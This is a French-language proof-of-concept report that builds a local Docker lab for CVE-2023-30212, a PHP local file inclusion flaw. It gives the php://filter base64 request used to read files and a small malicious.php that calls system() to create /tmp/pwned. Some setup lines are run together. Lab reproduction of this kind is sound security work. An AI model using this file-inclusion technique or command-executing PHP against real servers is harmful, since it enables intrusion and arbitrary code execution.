
PoC pour CVE-2023-30212 utilisant Docker
PoC pour CVE-2023-30212 utilisant Docker
Ce rapport décrit la configuration manuelle d'un environnement web vulnérable basé sur Docker pour la vulnérabilité CVE-2023-30212, absente de Vulhub, ainsi que la validation de cette vulnérabilité via un PoC.
php:8.1-apachevulnerable.php et malicious.php dans le répertoire /var/www/html8088
| Fichier | Description |
|---|---|
vulnerable.php | Fichier PHP contenant la vulnérabilité LFI |
malicious.php | Fichier PHP malveillant exécutant des commandes système |
docker-compose.yml | Fichier de configuration pour l'orchestration des conteneurs |
Dockerfile | Fichier de configuration pour la création de l'image Docker |




docker-compose up -d
Nom du conteneur : cve-2023-30212-cve-lfi-1
Le serveur Apache est lancé et accessible à l'adresse http://localhost:8088
http://localhost:8088/vulnerable.php?file=php://filter/convert.base64-encode/resource=malicious.php

Le décodage du résultat révèle le code PHP suivant :
<?php system("touch /tmp/pwned"); ?>

http://localhost:8088/malicious.php
Après l'exécution de la commande, le fichier /tmp/pwned doit être créé.
docker exec -it cve-2023-30212-cve-lfi-1 ls /tmp
Si le fichier pwned est présent dans les résultats, l'exploitation a réussi.

Consultation et décodage réussis du contenu du fichier malveillant via la vulnérabilité LFI basée sur php://filter
Exécution réussie de commandes arbitraires via l'appel du fichier PHP malveillant contenant la fonction system()
Validation du PoC confirmée par la création du fichier /tmp/pwned